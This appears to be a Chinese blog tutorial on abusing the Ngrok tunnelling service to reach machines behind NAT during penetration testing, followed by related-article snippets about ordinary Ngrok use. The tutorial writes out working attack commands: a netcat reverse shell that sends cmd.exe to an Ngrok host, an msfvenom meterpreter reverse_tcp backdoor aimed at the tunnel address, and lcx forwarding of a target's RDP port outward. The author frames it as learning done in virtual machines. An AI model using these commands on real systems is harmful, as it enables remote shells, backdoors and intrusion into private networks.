Ngrok内网穿透的几种利用

最新推荐文章于 2024-04-28 21:18:08 发布
最新推荐文章于 2024-04-28 21:18:08 发布
阅读量1.7w 收藏 4
点赞数
文章标签: 渗透 内网
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzzjx7/article/details/52618279
版权

      其实这篇之前投稿了,不过版权在我这里,地址在这里:http://bobao.360.cn/learning/detail/3041.html

      Ngrok是这样介绍:一条命令解决的外网访问内网问题,本地WEB外网访问、本地开发微信、TCP端口转发。有tcp端口转发的功能,就尝试利用ngrok进行内网的穿透。

Ngrok的网址:http://www.ngrok.cc/。【这个不是官网地址,可以自己搭建ngrok】

     渗透的时候,有时候我们是内网,对方服务器也是内网,而没有vps怎么办,而又想实现端口转发,而这时候可以利用ngrok进行tcp的端口转发,实现内网的穿透。而且支持macLinuxwindows

     PS:本文具有一定的攻击性,只用于学习,以下实验都是在虚拟机上面实现。

  首先先到http://www.ngrok.cc/login这个平台登陆进行注册,然后就可以添加自己本地需要转发的地址和接收的端口。


  

  选择需要的服务,填上外网需要接收的端口,和转发到本地的端口和地址。


1.进行nc的反弹

 192.168.1.100kali上面的ip,先选择对应的Linux版本,然后在Linux上面执行这句命令。

 ./sunny clientid 客户端id

当看到这个界面的时候,就可以进行转发了。


在要接收的Linux机器上面执行这个命令:

nc vv l p 12345


在内网的机器当中执行这个命令:

nc -vv server.ngrok.cc 11226 -e c:\Windows\System32\cmd.exe


成功接收,有点意思吧。

2.msf的反弹

 

   当没有一台外网的vps的时候,msf的利用是比较难的。但利用这个可以实现端口的转发。就可以实现即使在内网中也可以玩转msf。用法如下:

   先启动服务,kali上面执行这个命令:./sunny clientid 客户端id。


这里实现的是由外网的端口转发到内网的12345端口当中:server.ngrok.cc(119.28.62.35):11226->192.168.1.102kaliip:12345.

先生成一个后门:msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=119.28.62.35 LPORT=11226 -f exe x> back.exe。然后把后门放在内网的机器上面执行。在kali上面监听的结果:


成功反弹。

3.lcx实现的转发

  这次是在windows上面启动ngrok,所以选择相应的版本:

  先执行《Sunny-Ngrok启动工具.bat》,再输入客户端id


当看到以下界面就说明成功运行:


首先本地进行监听:

lcx -listen 12345 33891


然后将内网的3389转发出去,执行以下命令:

lcx.exe -slave server.ngrok.cc 11226 127.0.0.1 3389



然后用访问本地33891端口进行连接:


成功连接的机器。



   除了以上的方法,因为实现了端口转发,想利用的方式还是很多的,利用ssh端口的利用等。这里就不举例子了,自己可以尝试实现。
ZZZJX7
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
端口映射利器ngrok
08-11
NULL 博文链接:https://smalltengger.iteye.com/blog/2232977
初级内穿透工具Ngrok
09-23
总的来说,Ngrok作为一个初级内穿透工具,以其易用性和灵活性,为初学者和专业人士提供了一种高效且便捷的解决方案,帮助他们在开发和测试过程中跨越内的障碍。在实际应用中,了解并掌握Ngrok的使用方法,无疑能...
Ngrok的使用
攻城小弟的分享社区
05-10 418
当你在自己的电脑上,跑项目时,怎么让别人可以访问自己的项目呢? 今天我们来探讨一下,Ngork的使用 ngrok 是一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。ngrok 可捕获和分析所有通道上的流量,便于后期分析和重放。 进入官 注册一个账号 官地址: http://www.ngrok.cc/ 开通服务 点击隧道管理中的开启隧道,开始选择服务器,根据自己的要求,这里选择免费的 填写相关的信息 隧道名称 前置域名 随便写 http验证用户和密码可以填
Ngrok一把手教你内穿透【建议收藏】
qq_62543337的博客
04-28 485
将内的电脑 “暴露” 到公共络。可以简单理解为一个中间人,由于他知道你的电脑地址,所以能建立一条隧道,帮助其他用户访问到你的计算机。
ngrok使用
Zartillery的博客
10-11 782
ngrok 是一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。ngrok 可捕获和分析所有通道上的流量,便于后期分析和重放。 反向代理在计算机络中是代理服务器的一种。服务器根据客户端的请求,从其关系的一组或多组后端服务器(如Web服务器)上获取资源,然后再将这些资源返回给客户端,客户端只会得知反向代理的IP地址,而不知道在代理服务器后面的服务器集群的存在。 ...
为什么要使用ngrok
每天积累一点,一年后你会发现,自己变化很大
10-23 1425
1为什么要使用ngrok? 作为一个Web开发者,我们有时候会需要临时地将一个本地的Web站部署到外,以供它人体验评价或协助调试等等,通常我们会这么做: 找到一台运行于外的Web服务器 服务器上有站所需要的环境,否则自行搭建 将站部署到服务器上 调试结束后,再将站从服务器上删除 只不过是想向朋友展示一下站而已,要不要这么麻烦,累感不爱╰(`□′)╯ 2有了ngr
ngrok使用小结
半路出家,立地为猿
04-19 4289
在学习微信公众号的开发中,使用到了一款小工具ngrok. 1. ngrok是什么: ngrok is a reverse proxy that creates a secure tunnel from a public endpoint to a locally running web service. ngrok captures and analyzes all traffi
ngrok免费内穿透,重点是免费
06-14
2. 谁说内穿透如此复杂 - 云+社区 - 腾讯云.png:这可能是一张来自腾讯云社区的截图,展示了ngrok或其他内穿透工具的使用教程或案例,有助于理解内穿透的实际应用。 3. windows_64、linux、mac_64:这些...
ngrok.rar 免费内穿透技术
08-10
标题中的"ngrok.rar 免费内穿透技术"指的是ngrok提供的免费版服务,用户可以利用它实现内服务的公暴露,无需昂贵的服务器或复杂的络设置。描述中提到,ngrok的积分要求较低,下载时仅需33积分,这使得它对...
natapp内穿透、好用
最新发布
05-24
“natapp”是一款流行的内穿透工具,它基于Ngrok协议,能够帮助用户在没有公IP或者受到防火墙限制的情况下,将内服务暴露到公,实现远程访问。"natapp内穿透、好用"的标题和描述都强调了它的易用性和实用...
电脑教程内渗透之内穿透.rar
10-25
穿透主要有以下几种方法: 1. **UDP hole punching**:利用UDP协议的特性,通过在客户端和服务器之间建立双向通信。当两个处于NAT后的设备尝试互相通信时,它们可以发送UDP数据包到对方的公共IP和随机端口,...
Ngrok让你的本地Web应用暴露在公
xp5xp6的博客
11-29 5722
1.Ngrok介绍 Ngrok是一个反向代理,通过在公共的端点和本地运行的Web服务器之间建立一个安全的通道。Ngrok可捕获和分析所有通道上的流量,便于后期分析和重放。简单来说,利用 Ngrok可以通过外来访问部署在本地服务器的站,它还提供一个Web管理页来监控HTTP通信报文,方便程序员发现问题、开发调试。另外Ngrok还支持TCP层端口映射,不局限于某一特定的服务。支持Mac OS
ngrok的使用(超详细)
热门推荐
a5252145的博客
12-09 2万+
1、ngrok简介 百度百科:ngrok 是一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。ngrok 可捕获和分析所有通道上的流量,便于后期分析和重放. 对于前端的我来说,这丫的讲的啥玩意... 其实说白了就是你写一个项目,在PC上完美运行,想在手机端访问,只能让手机电脑处于同一局域内,但是这个技术可以把你的本地IP和端口(例如:localhost:80...
ngrok的配置使用
u012492535的专栏
10-19 463
ngrok的配置使用什么是ngrok?为什么要使用ngrok使用准备插入链接与图片 什么是ngrokngrok 是一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。 为什么要使用ngrok 作为一个web开发者,有时我们需要将本地的web站部署到外,供给客户体验评价,测试功能等等。通常我们会这么做: 找到一台运行于外的Web服务器; 服务器上有站所需要...
ngrok】一款好用的工具:让别人看到你的本地项目
HKD的博客
11-17 2983
ngrok】一款好用的工具:让别人看到你的本地项目 ngrok介绍:ngrok 是一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。ngrok 可捕获和分析所有通道上的流量,便于后期分析和重放。 对于初学者来说:ngrok能够提供一个强大功能,让别人通过链接访问到你的本地项目:免费 以在eclipse上开发JavaWeb项目为例,将JavaWeb项目开发好后,我们一般将项目部署在Tomcat服务器上,访问一个本地链接进行访问 下图是在eclipse上将项目运行在Tomcat
Ngrok穿透服务笔记
weixin_41579724的博客
07-08 63
免费服务器
玩转内穿透(3):进阶,Ngrok绑定多域名、多端口设置远程桌面连接
Mrqiang9001
08-23 5737
文章目录1 摘要 1 摘要
ngrok的使用
o1226_的博客
11-20 161
HTTP属于众多络协议中的其中之一。 在计算机的世界,协议指的是计算机之间,按什么格式、语法进行通信 用ngrok把本地应用映射到公 域名 ip地址+ 端口号 HTTP协议 如何让外界可以访问本机? 利用ngrok软件,可以实现把局域内的本机IP绑定到外部临时域名,供用户访问。 主要步骤: 1.下载ngrok软件安装包 2.在官免费注册,得到一个认证口令(auth-token) 3.配置并启动ngrok,得到一个临时域名,本机外界可以访问的服务器 1.在官www.ngrok.com免费注册一
ngrok跑"半天" 端口失效
vbaspdelphi的专栏
12-17 1376
最近接触到一个项目, 在联的时候有点小难度,internet左侧是客户服务器,右侧是我们办公区,我们办公区有公出口并且可以控制。为了更好地控制客户络,所以我选择在客户内部部署openvpn,并且通过ngrok映射到我们公司,这样我就可以在公司内部访问对方络了。但是,也许是由于跑视频流量过大,把端口“冲没了”,两边都有ngrok进程,可是端口却不在了。重启左侧openvpn服务器上的ngrok
ngrok穿透教程
06-08
Ngrok是一款可以将本地计算机的服务映射到公上,从而实现内穿透的工具。下面是ngrok的使用教程。 1. 下载ngrokngrok的官https://ngrok.com/上下载对应的版本,解压后得到ngrok的可执行文件。 2. 注册...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值